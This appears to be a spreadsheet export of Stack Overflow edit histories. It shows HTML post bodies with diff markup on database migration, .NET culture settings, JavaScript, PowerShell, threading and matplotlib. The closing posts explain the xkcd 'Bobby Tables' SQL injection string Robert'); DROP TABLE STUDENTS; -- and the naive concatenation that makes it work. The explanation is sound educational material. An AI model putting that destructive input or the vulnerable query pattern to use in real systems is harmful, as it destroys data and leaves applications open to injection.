    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a mysql database filled up and running on a windows computer, is there any tool to transfer the database to another computer (running ubuntu)?&lt;/p&gt; _x000D_
 &lt;p&gt; Else I'll just write a script to take all the data base into SQL and insert it on the other computer. Just trying to save some time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;CurrentCulture&lt;/code&gt; is the .NET representation of the default user locale of the system. This controls default number and date formatting and the like.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;CurrentUICulture&lt;/code&gt; refers to the default user interface language, a setting introduced in Windows 2000. This is primarily regarding the UI localization/translation part of your app.&lt;/p&gt; _x000D_
 &lt;p&gt; Whatever regional options the system is configured to have will be the "Current" values in your .NET app.&lt;/p&gt; _x000D_
 &lt;p&gt; Often times they are both the same. But on my system they would be different: I prefer my numbers and dates in the German format, so the &lt;code&gt;CurrentCulture&lt;/code&gt; would be German, but I also prefer all my applications in English, so the &lt;code&gt;CurrentUICulture&lt;/code&gt; would be English.&lt;/p&gt; _x000D_
 &lt;p&gt; There is a nice article on the topic: _x000D_
  &lt;strike&gt; _x000D_
   &lt;a href="http://www.siao2.com/2007/01/11/1449754.aspx" rel="nofollow noreferrer"&gt;Sorting it all Out: Why we have both CurrentCulture and CurrentUICulture&lt;/a&gt; _x000D_
  &lt;/strike&gt;. (EDIT: The linked blog appears to be dead. The web archive still has &lt;a href="http://web.archive.org/web/20120129201452/http://www.siao2.com/2007/01/11/1449754.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;a cached copy of that entry&lt;/span&gt;&lt;/a&gt;.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;CurrentCulture&lt;/code&gt; is the .NET representation of the default user locale of the system. This controls default number and date formatting and the like.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;CurrentUICulture&lt;/code&gt; refers to the default user interface language, a setting introduced in Windows 2000. This is primarily regarding the UI localization/translation part of your app.&lt;/p&gt; _x000D_
 &lt;p&gt; Whatever regional options the system is configured to have will be the "Current" values in your .NET app.&lt;/p&gt; _x000D_
 &lt;p&gt; Often times they are both the same. But on my system they would be different: I prefer my numbers and dates in the German format, so the &lt;code&gt;CurrentCulture&lt;/code&gt; would be German, but I also prefer all my applications in English, so the &lt;code&gt;CurrentUICulture&lt;/code&gt; would be English.&lt;/p&gt; _x000D_
 &lt;p&gt; There is a nice article on the topic: _x000D_
  &lt;strike&gt; _x000D_
   &lt;a href="http://www.siao2.com/2007/01/11/1449754.aspx" rel="nofollow noreferrer"&gt;Sorting it all Out: Why we have both CurrentCulture and CurrentUICulture&lt;/a&gt; _x000D_
  &lt;/strike&gt;. (EDIT: The linked blog appears to be dead. The web archive still has &lt;a href="http://web.archive.org/web/20120129201452/http://blogs.msdn.com/b/michkap/archive/2007/01/11/1449754.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;a cached copy of that entry&lt;/span&gt;&lt;/a&gt;.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;document.getElementsByTagName('object').namedItem('nestedPage').getContentDocument().styleSheets[d.styleSheets.length].href = &lt;span class="diff-delete"&gt;url;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;This way interacts with the tag&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;d = &lt;/span&gt;document.getElementsByTagName('object').namedItem('nestedPage').getContentDocument()&lt;span class="diff-add"&gt;;_x000D_
d&lt;/span&gt;.styleSheets[d.styleSheets.length].href = &lt;span class="diff-add"&gt;'whereever';&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;WARNING: hasn't been tested in all browsers&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>nsdel</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can write your own observer by extending the SenTestObserver class and implementing the notification listeners&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;(void) testSuiteDidStart:(NSNotification *) aNotification&lt;/li&gt; _x000D_
  &lt;li&gt;(void) testSuiteDidStop:(NSNotification *) aNotification&lt;/li&gt; _x000D_
  &lt;li&gt;(void) testCaseDidStart:(NSNotification *) aNotification&lt;/li&gt; _x000D_
  &lt;li&gt;(void) testCaseDidStop:(NSNotification *) aNotification&lt;/li&gt; _x000D_
  &lt;li&gt;(void) testCaseDidFail:(NSNotification *) aNotification&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Then&lt;/span&gt; add &lt;span class="diff-delete"&gt;a "&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;SenTestObserverClass&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;"&lt;/span&gt; entry to the &lt;span class="diff-delete"&gt;Info&lt;/span&gt;.plist with the name of your class.&lt;/p&gt; _x000D_
 &lt;p&gt; At least in the version of OCUnit &lt;span class="diff-delete"&gt;I'm&lt;/span&gt; familiar with&lt;span class="diff-delete"&gt;,&lt;/span&gt; SenTestObserver is equal parts useful/&lt;span class="diff-delete"&gt;broken&lt;/span&gt;. I just skip it altogether and register for the notifications myself in my own class. (&lt;span class="diff-delete"&gt;See&lt;/span&gt; SenTestSuiteRun.h and SenTestCaseRun.h for the defines of the notification names).&lt;/p&gt; _x000D_
 &lt;p&gt; You can use the test and run properties of the notification to access the SenTestSuite and SenTestSuiteRun instances, and the run instance contains the info needed on the actual results.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can write your own observer by extending the SenTestObserver class and implementing the notification listeners&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;(void) testSuiteDidStart:(NSNotification *) aNotification&lt;/li&gt; _x000D_
  &lt;li&gt;(void) testSuiteDidStop:(NSNotification *) aNotification&lt;/li&gt; _x000D_
  &lt;li&gt;(void) testCaseDidStart:(NSNotification *) aNotification&lt;/li&gt; _x000D_
  &lt;li&gt;(void) testCaseDidStop:(NSNotification *) aNotification&lt;/li&gt; _x000D_
  &lt;li&gt;(void) testCaseDidFail:(NSNotification *) aNotification&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;then&lt;/span&gt; add &lt;span class="diff-add"&gt;an&lt;/span&gt; entry to the &lt;span class="diff-add"&gt;info&lt;/span&gt;.plist&lt;span class="diff-add"&gt; SenTestObserverClass&lt;/span&gt; with the name of your class.&lt;/p&gt; _x000D_
 &lt;p&gt; At least in the version of OCUnit &lt;span class="diff-add"&gt;i'm&lt;/span&gt; familiar with SenTestObserver is equal parts useful/&lt;span class="diff-add"&gt;equal parts broken&lt;/span&gt;. I just skip it altogether and register for the notifications myself in my own class. (&lt;span class="diff-add"&gt;see&lt;/span&gt; SenTestSuiteRun.h and SenTestCaseRun.h for the defines of the notification names).&lt;/p&gt; _x000D_
 &lt;p&gt; You can use the test and run properties of the notification to access the SenTestSuite and SenTestSuiteRun instances, and the run instance contains the info needed on the actual results.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Quinn Taylor</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to create simple reusable javascript object publishing several methods and parametrized constructor. After reading throw several "OOP in JavaScript" guides I'm sitting here with an empty head. How on the Earth I could do this?&lt;/p&gt; _x000D_
 &lt;p&gt; Here my last nonworking code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SomeClass = function(id) {_x000D_
    this._id = id;_x000D_
}_x000D_
(&lt;span class="diff-delete"&gt;function&lt;/span&gt;() {_x000D_
    function intFun() {_x000D_
        return this._id;_x000D_
    }_x000D_
    SomeClass.prototype.extFun = function() {_x000D_
        return incFun();_x000D_
    }_x000D_
})();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to create simple reusable javascript object publishing several methods and parametrized constructor. After reading throw several "OOP in JavaScript" guides I'm sitting here with an empty head. How on the Earth I could do this?&lt;/p&gt; _x000D_
 &lt;p&gt; Here my last nonworking code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SomeClass = function(id) {_x000D_
    this._id = id;_x000D_
}_x000D_
(&lt;span class="diff-add"&gt;functin&lt;/span&gt;() {_x000D_
    function intFun() {_x000D_
        return this._id;_x000D_
    }_x000D_
    SomeClass.prototype.extFun = function() {_x000D_
        return incFun();_x000D_
    }_x000D_
})();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to change a site's home directory using powershell. This is what I have so far, but it isn't saving the changes...&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$server = "localhost"_x000D_
$siteName = "mysite"_x000D_
$iis = [ADSI]"IIS://$server/W3SVC"_x000D_
$site = $iis.psbase.children | where { $_.keyType -eq "IIsWebServer" _x000D_
        -AND $_.ServerComment -eq $siteName }_x000D_
$path = [adsi]($site.psbase.path+"/ROOT")_x000D_
_x000D_
$path.path = "D:\Sites\mysite\www2"_x000D_
$site.psbase.CommitChanges()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; answered below..&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to change a site's home directory using powershell. This is what I have so far, but it isn't saving the changes...&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$server = "localhost"_x000D_
$siteName = "mysite"_x000D_
$iis = [ADSI]"IIS://$server/W3SVC"_x000D_
$site = $iis.psbase.children | where { $_.keyType -eq "IIsWebServer" _x000D_
        -AND $_.ServerComment -eq $siteName }_x000D_
$path = [adsi]($site.psbase.path+"/ROOT")_x000D_
_x000D_
$path.path = "D:\Sites\mysite\www2"_x000D_
$site.psbase.CommitChanges()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Drew Gaynor</t>
  </si>
  <si>
    <t>Karl Glennon</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;CreateThread()&lt;/code&gt; is a raw Win32 API call for creating another thread of control at the kernel level.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;_beginthread()&lt;/code&gt; &amp;amp; &lt;code&gt;_beginthreadex()&lt;/code&gt; are C runtime library calls that call &lt;code&gt;CreateThread()&lt;/code&gt; behind the scenes. Once &lt;code&gt;CreateThread()&lt;/code&gt; has returned, &lt;code&gt;_beginthread/ex()&lt;/code&gt; takes care of additional bookkeeping to make the C runtime library usable &amp;amp; consistent in the new thread.&lt;/p&gt; _x000D_
 &lt;p&gt; In C++ you should almost certainly use &lt;code&gt;_beginthreadex()&lt;/code&gt; unless you won't be linking to the C runtime library at all (aka MSVCRT*.dll/.lib).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; EDIT: From my comments below:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; This is no longer quite as true as it used to be. The CRT will function correctly in a thread created by CreateThread() with the exception of he signal() function. There will be a small memory leak (~80 bytes) for each thread created with CreateThread() that uses the CRT, but it will function correctly. See for more info: &lt;/span&gt;&lt;a href="http://support.microsoft.com/default.aspx/kb/104641" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;support.microsoft.com/default.aspx/kb/104641&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;CreateThread()&lt;/code&gt; is a raw Win32 API call for creating another thread of control at the kernel level.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;_beginthread()&lt;/code&gt; &amp;amp; &lt;code&gt;_beginthreadex()&lt;/code&gt; are C runtime library calls that call &lt;code&gt;CreateThread()&lt;/code&gt; behind the scenes. Once &lt;code&gt;CreateThread()&lt;/code&gt; has returned, &lt;code&gt;_beginthread/ex()&lt;/code&gt; takes care of additional bookkeeping to make the C runtime library usable &amp;amp; consistent in the new thread.&lt;/p&gt; _x000D_
 &lt;p&gt; In C++ you should almost certainly use &lt;code&gt;_beginthreadex()&lt;/code&gt; unless you won't be linking to the C runtime library at all (aka MSVCRT*.dll/.lib).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>John Dibling</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The third option looks the most natural to me, although your use of spaces in side parentheses and superfluous parentheses contradict the &lt;a href="http://www.python.org/dev/peps/pep-0008/" rel="nofollow noreferrer"&gt;Python style guide&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; That guide also answers the to_copy question, but I would probably use clearer names altogether.&lt;/p&gt; _x000D_
 &lt;p&gt; I would write it as:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;import filecmp_x000D_
import shutil_x000D_
_x000D_
local = "local.txt"_x000D_
remote = "remote.txt"_x000D_
_x000D_
destination = &lt;span class="diff-delete"&gt;"C&lt;/span&gt;:\some\path\file.txt"_x000D_
source = remote if filecmp.cmp(local, destination) else local_x000D_
_x000D_
shutil.copyfile(source, destination)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The third option looks the most natural to me, although your use of spaces in side parentheses and superfluous parentheses contradict the &lt;a href="http://www.python.org/dev/peps/pep-0008/" rel="nofollow noreferrer"&gt;Python style guide&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; That guide also answers the to_copy question, but I would probably use clearer names altogether.&lt;/p&gt; _x000D_
 &lt;p&gt; I would write it as:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;import filecmp_x000D_
import shutil_x000D_
_x000D_
local = "local.txt"_x000D_
remote = "remote.txt"_x000D_
_x000D_
destination = &lt;span class="diff-add"&gt;r"C&lt;/span&gt;:\some\path\file.txt"_x000D_
source = remote if filecmp.cmp(local, destination) else local_x000D_
_x000D_
shutil.copyfile(source, destination)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The following &lt;span class="diff-delete"&gt;works&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;matplotlib.pyplot&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;as&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;plt&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;plt.&lt;/span&gt;rcParams[&lt;span class="hljs-string"&gt;'figure.figsize'&lt;/span&gt;] = &lt;span class="hljs-number"&gt;5&lt;/span&gt;, &lt;span class="hljs-number"&gt;10&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This makes the figure's width 5 inches, and its height 10 &lt;b&gt;inches&lt;/b&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; The Figure class then uses this as the default value for one of its arguments.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Deprecation note:&lt;/span&gt;&lt;/strong&gt;&lt;br&gt;&lt;span class="diff-add"&gt; As per the &lt;/span&gt;&lt;a href="https://matplotlib.org/faq/usage_faq.html#matplotlib-pyplot-and-pylab-how-are-they-related" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;official Matplotlib guide&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;, usage of the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;pylab&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; module is no longer recommended. Please consider using the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;matplotlib.pyplot&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; module instead, as described by &lt;/span&gt;&lt;a href="https://stackoverflow.com/a/41717533"&gt;&lt;span class="diff-add"&gt;this other answer&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; The following &lt;span class="diff-add"&gt;seems to work&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;from&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-add"&gt;pylab&lt;/span&gt; &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-add"&gt;rcParams&lt;/span&gt;_x000D_
rcParams[&lt;span class="hljs-string"&gt;'figure.figsize'&lt;/span&gt;] = &lt;span class="hljs-number"&gt;5&lt;/span&gt;, &lt;span class="hljs-number"&gt;10&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This makes the figure's width 5 inches, and its height 10 &lt;b&gt;inches&lt;/b&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; The Figure class then uses this as the default value for one of its arguments.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>FÃ©lix Gagnon-Grenier</t>
  </si>
  <si>
    <t>ImportanceOfBeingErnest</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Just looking at:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;![XKCD Strip][1]&lt;/span&gt; &lt;em&gt;(Source: &lt;span class="diff-delete"&gt;https://xkcd.com/327/&lt;/span&gt;)&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; What does this SQL do:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Robert'); DROP TABLE STUDENTS; --_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I know both &lt;code&gt;'&lt;/code&gt; and &lt;code&gt;--&lt;/code&gt; are for comments, but doesn't the word &lt;code&gt;DROP&lt;/code&gt; get commented as well since it is part of the same line?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; [1]: &lt;/span&gt;&lt;a href="https://i.stack.imgur.com/G0ifh.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;https://i.stack.imgur.com/G0ifh.png&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; "Her daughter is named Help I'm trapped in a driver's license factory."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lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Just looking at:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;img class="diff-add" src="https://i.stack.imgur.com/G0ifh.png" alt="XKCD Strip" title="Her daughter is named Help I'm trapped in a driver's license factory."&gt; &lt;em&gt;(Source: &lt;a href="https://xkcd.com/327/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;https://xkcd.com/327/&lt;/span&gt;&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; What does this SQL do:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Robert'); DROP TABLE STUDENTS; --_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I know both &lt;code&gt;'&lt;/code&gt; and &lt;code&gt;--&lt;/code&gt; are for comments, but doesn't the word &lt;code&gt;DROP&lt;/code&gt; get commented as well since it is part of the same line?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Floern</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;It drops the students table.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The original code in the school's program probably looks something like&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;q &lt;span class="hljs-operator"&gt;=&lt;/span&gt; "INSERT INTO Students VALUES ('" &lt;span class="hljs-operator"&gt;+&lt;/span&gt; &lt;span class="diff-delete"&gt;tbFullName&lt;/span&gt;.Text &lt;span class="hljs-operator"&gt;+&lt;/span&gt; "')";_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is the naive way to add text input into a query, and is &lt;em&gt;very bad&lt;/em&gt;, as you will see.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Now,&lt;/span&gt; &lt;code&gt;Robert'); DROP TABLE STUDENTS; --&lt;/code&gt;&lt;span class="diff-delete"&gt; is inserted into&lt;/span&gt; &lt;code&gt;&lt;span class="diff-delete"&gt;tbFullName.Text&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; and&lt;/span&gt; the result is now actually &lt;em&gt;two queries&lt;/em&gt; separated by the &lt;a href="http://en.wikipedia.org/wiki/SQL#Language_elements" rel="nofollow noreferrer"&gt;statement terminator&lt;/a&gt; (semicolon). The second query has been &lt;strong&gt;injected&lt;/strong&gt; into the first. When the code executes this query against the database, it will look like this&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;INSERT&lt;/span&gt; &lt;span class="hljs-keyword"&gt;INTO&lt;/span&gt; Students &lt;span class="hljs-keyword"&gt;VALUES&lt;/span&gt; (&lt;span class="hljs-string"&gt;'Robert'&lt;/span&gt;); &lt;span class="hljs-keyword"&gt;DROP&lt;/span&gt; &lt;span class="hljs-keyword"&gt;TABLE&lt;/span&gt; Students; &lt;span class="hljs-comment"&gt;--')&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; which, in plain English, roughly translates to the two queries:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Add a new record to the Students table with a Name value of 'Robert'&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; and&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Delete the Students table&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; Everything past the second query is &lt;a href="http://msdn.microsoft.com/en-us/library/ms181627.aspx" rel="nofollow noreferrer"&gt;marked as a comment&lt;/a&gt;: &lt;code&gt;--')&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;'&lt;/code&gt; in the student's name is not a comment, it's the closing &lt;a href="http://msdn.microsoft.com/en-us/library/ms179899.aspx" rel="nofollow noreferrer"&gt;string delimiter&lt;/a&gt;. Since the student's name is a string, it's needed syntactically to complete the hypothetical query. Injection attacks only work &lt;em&gt;when the SQL query they inject results in good SQL&lt;/em&gt; (good being very relative in this case).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;sup&gt;&lt;sup&gt;Edited &lt;em&gt;&lt;strong&gt;again&lt;/strong&gt;&lt;/em&gt; as per &lt;a href="http://stackoverflow.com/users/287586/dan04"&gt;dan04&lt;/a&gt;'s astute comment&lt;/sup&gt;&lt;/sup&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;sup&gt;&lt;sup&gt;&lt;span class="diff-delete"&gt;Edited to reflect &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Robert'); DROP TABLE STUDENTS; --&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;a href="https://www.xkcd.com/884/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;being his full name&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;&lt;/sup&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;It drops the students table.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The original code in the school's program probably looks something like&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;q &lt;span class="hljs-operator"&gt;=&lt;/span&gt; "INSERT INTO Students VALUES ('" &lt;span class="hljs-operator"&gt;+&lt;/span&gt; &lt;span class="diff-add"&gt;tbFName&lt;/span&gt;.Text &lt;span class="hljs-operator"&gt;+&lt;/span&gt; "'&lt;span class="diff-add"&gt;, " &lt;span class="hljs-operator"&gt;+&lt;/span&gt; tbLName.Text &lt;span class="hljs-operator"&gt;+&lt;/span&gt; "&lt;/span&gt;)";_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is the naive way to add text input into a query, and is &lt;em&gt;very bad&lt;/em&gt;, as you will see.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;After the values for &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;tbFName.Text&lt;/span&gt;&lt;/em&gt; &lt;span class="diff-add"&gt;(which is &lt;/span&gt;&lt;code&gt;Robert'); DROP TABLE STUDENTS; --&lt;/code&gt;&lt;span class="diff-add"&gt;) and&lt;/span&gt; &lt;em&gt;&lt;span class="diff-add"&gt;tbLName.Text&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; (let's call it &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Derper&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt;) are concatenated with&lt;/span&gt; the&lt;span class="diff-add"&gt; rest of the query, the&lt;/span&gt; result is now actually &lt;em&gt;two queries&lt;/em&gt; separated by the &lt;a href="http://en.wikipedia.org/wiki/SQL#Language_elements" rel="nofollow noreferrer"&gt;statement terminator&lt;/a&gt; (semicolon). The second query has been &lt;strong&gt;injected&lt;/strong&gt; into the first. When the code executes this query against the database, it will look like this&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;INSERT&lt;/span&gt; &lt;span class="hljs-keyword"&gt;INTO&lt;/span&gt; Students &lt;span class="hljs-keyword"&gt;VALUES&lt;/span&gt; (&lt;span class="hljs-string"&gt;'Robert'&lt;/span&gt;); &lt;span class="hljs-keyword"&gt;DROP&lt;/span&gt; &lt;span class="hljs-keyword"&gt;TABLE&lt;/span&gt; Students; &lt;span class="hljs-comment"&gt;--'&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-comment"&gt;, 'Derper'&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-comment"&gt;)&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; which, in plain English, roughly translates to the two queries:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Add a new record to the Students table with a Name value of 'Robert'&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; and&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
